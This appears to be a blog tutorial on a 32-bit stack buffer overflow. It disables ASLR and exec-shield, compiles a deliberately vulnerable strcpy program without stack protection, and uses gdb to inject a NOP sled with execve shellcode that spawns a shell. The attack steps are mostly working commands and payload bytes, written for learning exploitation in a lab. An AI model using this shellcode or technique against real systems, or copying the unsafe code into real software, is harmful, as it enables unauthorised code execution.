# Buffer overflow and arbitrary code execution (32-bit)


Disable protections

# echo '0' > /proc/sys/kernel/randomize_va_space
# echo '0' > /proc/sys/kernel/exec-shield
# echo '0' > /proc/sys/kernel/exec-shield-randomize


Vulnerable code

# cat vulnerable.c
#include <stdio.h>
#include <string.h>

void check_password(char *p){
        char password[64];
        strcpy(password,p);
        if(strcmp(password,"nop-sled")==0){printf("Correct password\n");}
        else{printf("Incorrect password\n");}
}

int main(int argc,char **argv){
        check_password(argv[1]);
        return 0;
}
# gcc -g -fno-stack-protector -z execstack -o vulnerable vulnerable.c

Arbitrary code execution

# gdb -q vulnerable
(gdb) list 1,14
1       #include <stdio.h>
2       #include <string.h>
3
4       void check_password(char *p){
5               char password[64];
6               strcpy(password,p);
7               if(strcmp(password,"nop-sled")==0){printf("Correct password\n");}
8               else{printf("Incorrect password\n");}
9       }
10
11      int main(int argc,char **argv){
12              check_password(argv[1]);
13              return 0;
14      }
(gdb) break 6
(gdb) disassemble main
Dump of assembler code for function main:
   0x08048477 <+0>:     push   %ebp
   0x08048478 <+1>:     mov    %esp,%ebp
   0x0804847a <+3>:     and    $0xfffffff0,%esp
   0x0804847d <+6>:     sub    $0x10,%esp
   0x08048480 <+9>:     mov    0xc(%ebp),%eax
   0x08048483 <+12>:    add    $0x4,%eax
   0x08048486 <+15>:    mov    (%eax),%eax
   0x08048488 <+17>:    mov    %eax,(%esp)
   0x0804848b <+20>:    call   0x8048414 <check_password>
   0x08048490 <+25>:    mov    $0x0,%eax
   0x08048495 <+30>:    leave
   0x08048496 <+31>:    ret
End of assembler dump.
(gdb) run wakamole
Starting program: /vulnerable wakamole

Breakpoint 1, check_password (p=0xbffff935 "wakamole") at vulnerable.c:6
6               strcpy(password,p);
(gdb) x /20x password
0xbffff6f0:     0x08048261      0x00000000      0x00ca0000      0x00000001
0xbffff700:     0xbffff91f      0x0000002f      0xbffff75c      0xb7fd1ff4
0xbffff710:     0x080484a0      0x08049ff4      0x00000002      0x080482fd
0xbffff720:     0xb7fd23e4      0x00000005      0x08049ff4      0x080484c1
0xbffff730:     0x00000000      0x00000000      0xbffff758      0x08048490
(gdb) run `perl -e 'print "\x90"x16 . "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "\x90\x90" . "\xb0\xf6\xff\xbf"x9'`
The program being debugged has been started already.
Start it from the beginning? (y o n) y

Starting program: /vulnerable `perl -e 'print "\x90"x16 . "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "\x90\x90" . "\xb0\xf6\xff\xbf"x9'`

Breakpoint 1, check_password (
    p=0xbffff8ed "\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\061\300\231\260\vRh//shh/bin\211\343R\211\342S\211\341̀\220\220\260\366\377\277\260\366\377\277\260\366\377\277\260\366\377\277\260\366\377\277\260\366\377\277\260\366\377\277\260\366\377\277\260\366\377\277")
    at vulnerable.c:6
6               strcpy(password,p);
(gdb) x /20x password
0xbffff6b0:     0x08048261      0x00000000      0x00ca0000      0x00000001
0xbffff6c0:     0xbffff8d7      0x0000002f      0xbffff71c      0xb7fd1ff4
0xbffff6d0:     0x080484a0      0x08049ff4      0x00000002      0x080482fd
0xbffff6e0:     0xb7fd23e4      0x00000005      0x08049ff4      0x080484c1
0xbffff6f0:     0x00000000      0x00000000      0xbffff718      0x08048490
(gdb) next
7               if(strcmp(password,"nop-sled")==0){printf("Correct password\n");}
(gdb) x /20x password
0xbffff6b0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff6c0:     0xb099c031      0x2f68520b      0x6868732f      0x6e69622f
0xbffff6d0:     0x8952e389      0xe18953e2      0x909080cd      0xbffff6b0
0xbffff6e0:     0xbffff6b0      0xbffff6b0      0xbffff6b0      0xbffff6b0
0xbffff6f0:     0xbffff6b0      0xbffff6b0      0xbffff6b0      0xbffff6b0
(gdb) continue
Incorrect password
process 2246 is executing new program: /bin/dash
# exit


References

http://www.overflowedminds.net/Papers/Newlog/Introduccion-Explotacion-Software-Linux.pdf

No comments: